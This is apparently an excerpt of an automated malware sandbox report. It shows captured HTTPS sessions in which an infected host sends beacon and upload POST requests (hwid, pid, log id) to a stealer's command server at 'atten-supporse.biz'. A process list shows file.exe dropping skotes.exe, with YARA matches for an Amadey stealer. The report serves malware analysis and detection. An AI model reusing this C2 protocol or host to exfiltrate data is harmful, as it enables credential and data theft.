                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tjt%2FtRtowkshrTaCP5PQBXp3SqEVK2Gf%2B0oOwK7zRlC5hasYEzAd2qckJ3ipHpGTHxxlL2Pa7nfi8AHvMjthCT8p1tw2GL%2FpJxOomZj0%2FO7OkvQF8haHmWeqdaeD38l9shsSawk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a3010cb54231-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1609&rtt_var=612&sent=200&recv=584&lost=0&retrans=0&sent_bytes=2847&recv_bytes=562224&delivery_rate=1814791&cwnd=127&unsent_bytes=0&cid=c38c4effb61c17f3&ts=2238&x=0"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            23192.168.2.650065104.21.48.1443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:10:17 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:10:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                            2024-12-09 20:10:17 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:17 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=dr9tjqn360hdposj3in1gfsjcv; expires=Fri, 04-Apr-2025 13:56:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iuar06qAQ6ZXF2s1DgNE27s3%2Fo00d4fhbu2Fj6l2c%2FOJAbepmgUPKVF%2BzfBO5wjn%2FTnpPEwaL3ZMdj%2Bjsg3LFcAyFidkNUo%2F7OMMU%2BO6NIPGgPHfiBJqD7NvAwumIdrgy7EdlZQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a342fca00cc8-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1514&min_rtt=1508&rtt_var=578&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1871794&cwnd=225&unsent_bytes=0&cid=f317f0a4b03022ac&ts=772&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:10:17 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                            2024-12-09 20:10:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            24192.168.2.650074104.21.48.1443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:10:21 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 53
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:10:21 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                            2024-12-09 20:10:21 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:10:21 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=jurnlcs7e8v1ms5p1f7hvqgqme; expires=Fri, 04-Apr-2025 13:57:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z4pG2MkDN5OQgBrBcNsOIPKTuYHwXTlzmejbKFdZvfifbP968jIydgMyfHrpdiGH4GFdu7Pt493lAHdLWENm4Nh4%2BChcuGTLVLrkyETBrNEQQLEgWueXhuYwvoWs7CWBah5z9pc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a35bdbe10cc8-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2043&min_rtt=1968&rtt_var=888&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=955&delivery_rate=1135744&cwnd=225&unsent_bytes=0&cid=58d15e4b06922610&ts=757&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:10:21 UTC358INData Raw: 34 39 31 63 0d 0a 31 54 4a 7a 71 44 6d 46 78 69 72 76 72 56 75 66 63 66 36 69 45 47 77 34 51 5a 68 4b 65 6e 2f 4f 73 65 49 50 33 4d 6a 65 54 38 43 75 45 41 57 4b 41 37 48 71 43 4a 7a 49 65 61 55 46 6a 4e 64 31 51 42 6f 67 2f 47 68 41 47 61 2f 64 6b 57 72 77 36 71 67 69 34 75 39 55 45 73 52 4b 34 4f 6f 49 69 74 56 35 70 53 71 46 67 48 55 43 47 6e 75 36 4c 78 41 64 72 39 32 41 62 72 65 6e 72 69 4f 6a 76 56 34 55 77 46 7a 6d 6f 6b 75 44 77 44 37 36 46 4a 2f 49 66 67 56 56 4b 66 56 6f 56 6c 32 72 79 38 41 31 2f 6f 57 37 4f 36 47 59 55 77 44 44 47 2f 6a 71 55 63 33 49 4e 62 31 4c 33 4d 4e 31 44 6c 51 6e 2f 43 45 53 46 36 62 56 67 57 75 32 75 4c 63 70 71 4c 31 51 46 38 46 57 37 37 5a 47 69 63 63 31 2f 42 36 66 67 44 78 4f 58 54 75 36 63 46 68 4f 6e 74 43 52 66
                                                                                                                                                                                                                                            Data Ascii: 491c1TJzqDmFxirvrVufcf6iEGw4QZhKen/OseIP3MjeT8CuEAWKA7HqCJzIeaUFjNd1QBog/GhAGa/dkWrw6qgi4u9UEsRK4OoIitV5pSqFgHUCGnu6LxAdr92AbrenriOjvV4UwFzmokuDwD76FJ/IfgVVKfVoVl2ry8A1/oW7O6GYUwDDG/jqUc3INb1L3MN1DlQn/CESF6bVgWu2uLcpqL1QF8FW77ZGicc1/B6fgDxOXTu6cFhOntCRf
                                                                                                                                                                                                                                            2024-12-09 20:10:21 UTC1369INData Raw: 68 63 51 79 2b 41 47 58 79 58 38 44 57 69 37 77 4a 78 73 64 71 39 6d 4b 59 72 53 75 73 53 43 6b 74 31 42 52 68 42 76 67 76 41 6a 56 6a 78 72 34 41 35 76 4d 5a 45 78 67 59 2b 56 6d 41 56 32 72 33 38 41 31 2f 71 4b 35 4c 71 47 38 58 78 4c 43 55 50 57 6b 57 6f 76 43 50 4f 38 56 6d 63 35 34 44 55 67 70 39 43 34 62 46 4b 66 61 68 57 71 36 36 76 4a 74 70 61 38 51 53 59 70 36 36 71 39 45 68 39 67 35 76 51 7a 53 32 54 49 4a 56 6d 4f 69 61 42 77 63 71 4e 4b 45 59 37 43 75 73 43 75 73 75 6c 38 58 77 46 76 67 72 6b 43 46 7a 6a 54 32 48 4a 7a 46 66 77 70 63 4c 2f 73 74 57 46 50 73 31 4a 67 74 35 75 71 53 4b 71 47 6c 45 69 54 4a 56 65 6d 6a 58 73 33 51 64 2b 52 54 6d 38 77 79 56 68 6f 74 2f 79 63 4b 48 4c 37 57 6a 6e 2b 79 72 37 6f 67 6f 62 6c 51 46 4d 31 57 36 61 4a
                                                                                                                                                                                                                                            Data Ascii: hcQy+AGXyX8DWi7wJxsdq9mKYrSusSCkt1BRhBvgvAjVjxr4A5vMZExgY+VmAV2r38A1/qK5LqG8XxLCUPWkWovCPO8Vmc54DUgp9C4bFKfahWq66vJtpa8QSYp66q9Eh9g5vQzS2TIJVmOiaBwcqNKEY7CusCusul8XwFvgrkCFzjT2HJzFfwpcL/stWFPs1Jgt5uqSKqGlEiTJVemjXs3Qd+RTm8wyVhot/ycKHL7Wjn+yr7ogoblQFM1W6aJ
                                                                                                                                                                                                                                            2024-12-09 20:10:21 UTC1369INData Raw: 2b 52 54 6d 38 77 79 56 68 6f 75 38 69 30 64 45 71 33 5a 6a 6d 69 30 70 72 51 6a 6f 61 56 66 46 63 70 58 37 36 35 46 67 38 73 78 39 42 69 58 78 6e 49 50 55 47 4f 30 61 42 38 46 37 49 76 41 57 62 6d 6d 73 53 4c 67 67 6c 4d 66 78 46 7a 78 35 46 66 44 31 6e 6e 36 48 39 79 59 4d 67 4a 54 49 2f 45 69 48 42 32 72 33 6f 56 75 75 61 6d 78 4b 71 69 35 56 78 58 47 55 75 71 69 53 49 72 4c 50 4f 38 57 6c 63 78 2b 54 68 52 6a 2f 54 42 59 52 65 7a 38 68 33 75 39 68 62 38 38 71 2f 64 50 58 39 4d 62 34 4b 67 49 31 59 38 2b 2b 42 75 58 78 6e 6f 4f 53 43 62 30 49 78 6b 58 71 74 4b 4e 59 62 69 71 76 53 32 6b 75 31 41 57 7a 55 6e 31 6f 55 36 66 78 58 6d 7a 55 35 76 59 4d 6c 59 61 46 65 6f 2f 43 51 76 75 35 6f 4e 6a 73 4b 32 71 62 62 33 35 53 56 48 4e 56 36 66 38 43 49 62 50
                                                                                                                                                                                                                                            Data Ascii: +RTm8wyVhou8i0dEq3Zjmi0prQjoaVfFcpX765Fg8sx9BiXxnIPUGO0aB8F7IvAWbmmsSLgglMfxFzx5FfD1nn6H9yYMgJTI/EiHB2r3oVuuamxKqi5VxXGUuqiSIrLPO8Wlcx+ThRj/TBYRez8h3u9hb88q/dPX9Mb4KgI1Y8++BuXxnoOSCb0IxkXqtKNYbiqvS2ku1AWzUn1oU6fxXmzU5vYMlYaFeo/CQvu5oNjsK2qbb35SVHNV6f8CIbP
                                                                                                                                                                                                                                            2024-12-09 20:10:21 UTC1369INData Raw: 66 53 63 67 4e 65 4c 2f 34 67 45 78 66 73 6e 63 42 71 70 75 72 6b 62 5a 65 36 58 78 48 4a 54 61 65 37 42 70 53 50 50 76 46 54 78 49 42 2b 41 46 6f 73 39 69 51 54 46 61 33 66 6a 6d 71 37 6f 37 51 6c 73 4c 5a 55 47 63 74 56 36 4b 56 4d 69 4d 6f 39 2b 68 65 61 7a 7a 4a 41 47 69 54 69 61 45 42 64 67 2f 53 31 4c 35 2b 51 2f 44 4c 73 72 68 41 57 78 68 75 2f 35 45 53 4f 77 7a 48 79 46 5a 58 4d 65 41 64 52 4c 2f 45 73 46 42 53 70 31 59 46 6f 75 36 75 34 49 61 69 78 55 78 4c 46 56 4f 69 73 43 4d 4f 50 50 75 56 54 78 49 42 58 47 56 45 74 2f 47 67 48 55 37 57 54 68 32 48 2b 38 76 77 68 71 37 46 57 46 4d 5a 61 34 61 78 4e 68 63 73 34 2b 78 57 66 7a 33 59 4c 57 79 7a 2b 4a 42 59 58 72 64 4b 4d 5a 72 47 68 75 57 33 73 39 31 63 4a 69 67 4f 6e 6c 55 75 62 32 43 6e 78 55
                                                                                                                                                                                                                                            Data Ascii: fScgNeL/4gExfsncBqpurkbZe6XxHJTae7BpSPPvFTxIB+AFos9iQTFa3fjmq7o7QlsLZUGctV6KVMiMo9+heazzJAGiTiaEBdg/S1L5+Q/DLsrhAWxhu/5ESOwzHyFZXMeAdRL/EsFBSp1YFou6u4IaixUxLFVOisCMOPPuVTxIBXGVEt/GgHU7WTh2H+8vwhq7FWFMZa4axNhcs4+xWfz3YLWyz+JBYXrdKMZrGhuW3s91cJigOnlUub2CnxU
                                                                                                                                                                                                                                            2024-12-09 20:10:21 UTC1369INData Raw: 4f 58 54 75 36 63 46 67 7a 70 38 43 58 62 72 43 68 71 6a 62 69 71 42 34 49 69 6c 7a 72 35 42 44 4e 7a 44 4c 32 46 35 7a 4d 63 67 70 58 49 2b 67 6e 48 78 71 6c 32 4a 4a 6e 75 61 32 33 4a 61 6d 34 56 67 50 47 56 66 57 68 57 70 2b 50 64 37 30 55 68 49 41 71 54 6d 77 6b 36 6a 67 62 58 35 33 46 67 33 75 31 70 37 42 74 76 66 6c 4a 55 63 31 58 70 2f 77 49 69 38 41 77 2f 68 79 64 79 58 34 44 58 79 72 2f 4b 52 34 5a 70 74 6d 41 61 37 69 72 75 53 65 68 74 6c 6f 59 7a 56 50 67 70 31 72 4e 67 58 6e 36 43 39 79 59 4d 69 64 64 4d 66 51 34 57 41 4c 69 79 73 42 71 73 75 72 6b 62 61 61 39 58 78 58 4e 56 2b 47 68 54 6f 44 4f 4e 76 77 54 6b 38 52 35 42 31 77 69 39 79 30 56 47 62 37 5a 69 32 4b 79 6f 37 41 67 34 76 6b 51 46 74 49 62 76 2b 52 35 67 4d 45 33 2b 67 58 63 33 7a
                                                                                                                                                                                                                                            Data Ascii: OXTu6cFgzp8CXbrChqjbiqB4Iilzr5BDNzDL2F5zMcgpXI+gnHxql2JJnua23Jam4VgPGVfWhWp+Pd70UhIAqTmwk6jgbX53Fg3u1p7BtvflJUc1Xp/wIi8Aw/hydyX4DXyr/KR4ZptmAa7iruSehtloYzVPgp1rNgXn6C9yYMiddMfQ4WALiysBqsurkbaa9XxXNV+GhToDONvwTk8R5B1wi9y0VGb7Zi2Kyo7Ag4vkQFtIbv+R5gME3+gXc3z
                                                                                                                                                                                                                                            2024-12-09 20:10:21 UTC1369INData Raw: 39 79 73 65 47 36 66 66 6b 6d 53 2b 71 62 64 74 37 50 64 58 43 59 6f 44 70 34 64 66 6d 38 55 2b 38 51 57 58 77 58 45 59 56 7a 4f 36 5a 6c 67 4d 71 38 4c 41 4e 61 69 36 71 79 71 39 2b 55 6c 52 7a 56 65 6e 2f 41 69 4c 78 6a 2f 36 46 5a 4c 53 64 77 68 56 4c 50 4d 68 48 42 57 76 30 34 52 70 75 61 2b 2f 49 61 6d 77 55 78 37 4f 55 75 6d 74 52 38 32 42 65 66 6f 4c 33 4a 67 79 4c 30 45 67 39 69 56 59 41 75 4c 4b 77 47 71 79 36 75 52 74 72 72 6c 56 45 63 42 64 34 36 46 4f 68 38 6f 35 39 68 43 54 78 48 51 4b 56 53 50 78 49 52 6b 62 71 64 6d 4c 61 37 4f 70 75 69 76 69 2b 52 41 57 30 68 75 2f 35 47 69 57 77 6a 58 36 55 34 4f 4f 61 30 35 64 4c 37 70 77 57 42 61 67 31 34 64 74 73 36 6d 30 4b 4b 61 39 56 52 48 43 53 65 2b 6b 54 35 2f 64 4f 66 51 57 6b 4d 4e 79 43 6c 77
                                                                                                                                                                                                                                            Data Ascii: 9yseG6ffkmS+qbdt7PdXCYoDp4dfm8U+8QWXwXEYVzO6ZlgMq8LANai6qyq9+UlRzVen/AiLxj/6FZLSdwhVLPMhHBWv04Rpua+/IamwUx7OUumtR82BefoL3JgyL0Eg9iVYAuLKwGqy6uRtrrlVEcBd46FOh8o59hCTxHQKVSPxIRkbqdmLa7Opuivi+RAW0hu/5GiWwjX6U4OOa05dL7pwWBag14dts6m0KKa9VRHCSe+kT5/dOfQWkMNyClw
                                                                                                                                                                                                                                            2024-12-09 20:10:21 UTC1369INData Raw: 78 4b 39 37 63 41 31 70 35 54 38 4a 72 53 77 51 42 4c 63 55 4f 71 6f 57 62 4f 50 59 61 6c 42 7a 70 49 67 58 45 56 6a 35 52 64 57 58 61 32 54 32 46 53 6e 36 71 70 74 2b 75 55 65 55 64 67 62 76 2b 51 50 6a 74 30 72 2b 78 43 4b 77 7a 55 77 5a 41 54 73 49 68 38 4e 71 38 53 50 4c 66 44 71 73 32 33 36 6a 68 41 59 7a 55 44 32 73 6b 57 64 79 48 6e 43 58 64 7a 59 4d 6c 59 61 46 76 6b 6d 46 68 71 36 77 73 31 4b 71 4b 43 37 50 61 57 67 58 31 47 45 47 2b 48 6b 45 4e 36 42 65 66 6b 43 33 4a 67 69 58 41 46 32 71 58 39 49 54 37 4f 64 6d 53 32 6f 36 75 52 2f 37 50 64 43 55 5a 49 62 6f 4b 64 61 6e 38 6b 36 36 78 44 62 2f 6b 77 70 51 43 37 38 50 77 6b 6a 6b 74 53 61 59 4c 69 39 72 57 47 33 74 46 34 66 7a 55 32 6e 36 67 69 43 6a 32 48 45 55 39 53 41 54 55 41 61 4f 37 70 77
                                                                                                                                                                                                                                            Data Ascii: xK97cA1p5T8JrSwQBLcUOqoWbOPYalBzpIgXEVj5RdWXa2T2FSn6qpt+uUeUdgbv+QPjt0r+xCKwzUwZATsIh8Nq8SPLfDqs236jhAYzUD2skWdyHnCXdzYMlYaFvkmFhq6ws1KqKC7PaWgX1GEG+HkEN6BefkC3JgiXAF2qX9IT7OdmS2o6uR/7PdCUZIboKdan8k66xDb/kwpQC78PwkjktSaYLi9rWG3tF4fzU2n6giCj2HEU9SATUAaO7pw
                                                                                                                                                                                                                                            2024-12-09 20:10:21 UTC1369INData Raw: 50 53 63 76 43 7a 2f 44 76 69 37 77 4a 66 69 6b 6d 6e 2f 41 6a 4b 7a 43 76 76 46 5a 2f 57 63 55 6c 6b 48 64 30 6d 48 78 79 36 77 35 64 69 67 4a 53 70 4c 71 79 35 56 77 66 62 47 36 6e 6b 52 38 32 58 41 4c 31 62 33 50 38 38 54 6b 4a 6a 6f 6d 67 74 48 71 4c 64 68 33 75 76 35 35 73 6a 70 62 5a 47 41 64 31 55 70 2b 6f 49 69 34 39 68 72 31 33 63 78 47 4e 4f 41 6e 4f 6f 63 30 31 4f 2b 34 50 53 63 76 43 7a 2f 44 76 69 37 77 4a 66 69 6b 6d 6e 2f 41 6a 4b 7a 43 76 76 46 5a 2f 57 63 55 6c 6b 48 64 30 6d 48 78 79 36 77 35 64 69 38 59 53 4b 44 4a 79 4a 52 52 4c 45 56 65 43 79 57 63 32 42 65 66 4a 54 78 50 6b 79 52 68 6f 63 74 47 67 41 58 66 53 54 74 57 36 77 70 4c 73 37 73 2f 70 33 48 38 31 61 38 62 52 66 67 6f 41 58 79 7a 4c 63 6a 6a 49 49 47 6e 75 6f 5a 6c 67 5a 76
                                                                                                                                                                                                                                            Data Ascii: PScvCz/Dvi7wJfikmn/AjKzCvvFZ/WcUlkHd0mHxy6w5digJSpLqy5VwfbG6nkR82XAL1b3P88TkJjomgtHqLdh3uv55sjpbZGAd1Up+oIi49hr13cxGNOAnOoc01O+4PScvCz/Dvi7wJfikmn/AjKzCvvFZ/WcUlkHd0mHxy6w5di8YSKDJyJRRLEVeCyWc2BefJTxPkyRhoctGgAXfSTtW6wpLs7s/p3H81a8bRfgoAXyzLcjjIIGnuoZlgZv
                                                                                                                                                                                                                                            2024-12-09 20:10:21 UTC1369INData Raw: 39 36 49 30 37 6f 62 64 65 46 6f 6f 56 70 37 77 49 31 59 38 55 37 78 53 4d 77 7a 4a 41 47 69 2b 36 63 46 67 51 76 74 53 51 62 76 4b 74 70 69 72 69 71 42 34 49 69 6b 32 6e 2f 42 76 44 6a 79 75 39 53 39 79 48 66 41 4e 62 49 50 51 72 43 67 2b 71 30 4a 5a 75 2b 5a 53 43 41 4c 43 77 51 42 4b 49 61 75 71 67 58 70 6a 4d 4b 66 6f 74 6f 75 31 67 43 55 6f 67 75 41 51 66 45 4b 44 74 76 6c 71 76 72 61 78 76 68 4c 52 47 45 6f 6f 56 70 37 77 49 31 59 38 55 37 78 53 4d 77 7a 41 69 58 53 37 32 61 41 64 54 74 5a 4f 57 4c 65 62 35 38 6d 32 77 39 77 68 52 6a 56 6a 31 74 6b 36 4f 32 54 71 36 4c 61 4c 74 59 41 6c 4b 49 4c 67 5a 46 52 6d 36 78 6f 4e 39 75 5a 53 43 41 4c 43 77 51 42 4b 49 66 74 33 6d 65 5a 76 4d 4f 66 4d 55 33 49 34 79 46 68 70 37 75 67 55 4b 47 72 7a 51 77 6b
                                                                                                                                                                                                                                            Data Ascii: 96I07obdeFooVp7wI1Y8U7xSMwzJAGi+6cFgQvtSQbvKtpiriqB4Iik2n/BvDjyu9S9yHfANbIPQrCg+q0JZu+ZSCALCwQBKIauqgXpjMKfotou1gCUoguAQfEKDtvlqvraxvhLRGEooVp7wI1Y8U7xSMwzAiXS72aAdTtZOWLeb58m2w9whRjVj1tk6O2Tq6LaLtYAlKILgZFRm6xoN9uZSCALCwQBKIft3meZvMOfMU3I4yFhp7ugUKGrzQwk


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            25192.168.2.650079104.21.48.1443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:10:23 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=OOK1G9CXM5AFEVAWA0Q
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 11628
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:10:23 UTC11628OUTData Raw: 2d 2d 4f 4f 4b 31 47 39 43 58 4d 35 41 46 45 56 41 57 41 30 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4f 4f 4b 31 47 39 43 58 4d 35 41 46 45 56 41 57 41 30 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 4f 4b 31 47 39 43 58 4d 35 41 46 45 56 41 57 41 30 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                                                                                            Data Ascii: --OOK1G9CXM5AFEVAWA0QContent-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--OOK1G9CXM5AFEVAWA0QContent-Disposition: form-data; name="pid"2--OOK1G9CXM5AFEVAWA0QContent-Disposition: form-data; name="lid"LOGS11--Li


                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:15:07:56
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                            Imagebase:0xf40000
                                                                                                                                                                                                                                            File size:3'279'872 bytes
                                                                                                                                                                                                                                            MD5 hash:D75B31BA6F3BEBDB12B9C28A09D444F9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                            Start time:15:07:58
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                                            File size:3'279'872 bytes
                                                                                                                                                                                                                                            MD5 hash:D75B31BA6F3BEBDB12B9C28A09D444F9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2183253576.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            • Detection: 55%, ReversingLabs
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                            Start time:15:07:59
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                                            File size:3'279'872 bytes
                                                                                                                                                                                                                                            MD5 hash:D75B31BA6F3BEBDB12B9C28A09D444F9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                            Start time:15:09:00
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                                                                                                                            File size:3'279'872 bytes
                                                                                                                                                                                                                                            MD5 hash:D75B31BA6F3BEBDB12B9C28A09D444F9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
